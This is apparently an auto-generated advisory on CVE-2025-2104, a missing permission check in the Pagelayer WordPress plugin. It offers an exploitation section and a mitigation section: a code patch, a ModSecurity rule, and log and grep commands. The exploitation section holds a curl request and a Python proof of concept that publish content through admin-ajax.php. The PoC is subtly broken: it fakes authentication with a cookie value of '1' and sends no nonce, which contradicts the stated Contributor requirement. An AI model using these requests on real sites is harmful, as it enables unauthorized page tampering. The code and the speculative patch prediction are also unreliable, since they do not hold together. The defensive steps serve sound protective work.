Listen to this Post
How CVE-2025-2104 Works
The Page Builder: Pagelayer plugin (≤ v1.9.8) for WordPress contains a flawed `pagelayer_save_content()` function that fails to properly validate user permissions before executing post updates. Attackers with Contributor-level access (or higher) can bypass WordPress’s default post moderation system by sending a crafted HTTP POST request containing malicious post data. The function does not verify if the user has `publish_posts` capability, allowing unauthorized changes to post status from “draft” to “publish.” This occurs due to missing capability checks and improper nonce validation in AJAX handlers.
DailyCVE Form:
Platform: WordPress
Version: ≤ 1.9.8
Vulnerability: Auth Bypass
Severity: Critical
Date: 2025-03-13
Prediction: Patch by 2025-06-20
What Undercode Say:
Exploitation:
1. Craft Malicious Request:
curl -X POST https://target.com/wp-admin/admin-ajax.php \ -d 'action=pagelayer_save_content&post_id=123&status=publish'
2. Python PoC:
import requests
data = {
'action': 'pagelayer_save_content',
'post_id': '123',
'content': '
<h1>Hacked</h1>
',
'status': 'publish'
}
requests.post("http://wordpress-site/wp-admin/admin-ajax.php", data=data, cookies={"wordpress_logged_in": "1"})
Mitigation:
1. Temporary Fix:
Add capability checks in `pagelayer_save_content()`:
if (!current_user_can('publish_posts')) { wp_die('Unauthorized'); }
2. WAF Rule (ModSecurity):
SecRule ARGS:action "@streq pagelayer_save_content" \ "id:1005,deny,status:403,msg:'Pagelayer Exploit Attempt'"
3. Detection Command:
grep -r "pagelayer_save_content" /var/www/html/wp-content/plugins/pagelayer/
4. Patch Monitoring:
watch -n 3600 wp plugin update --dry-run pagelayer
5. Log Analysis:
tail -f /var/log/apache2/access.log | grep 'admin-ajax.php' | grep 'pagelayer_save_content'
6. Disable Plugin (Emergency):
wp plugin deactivate pagelayer
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
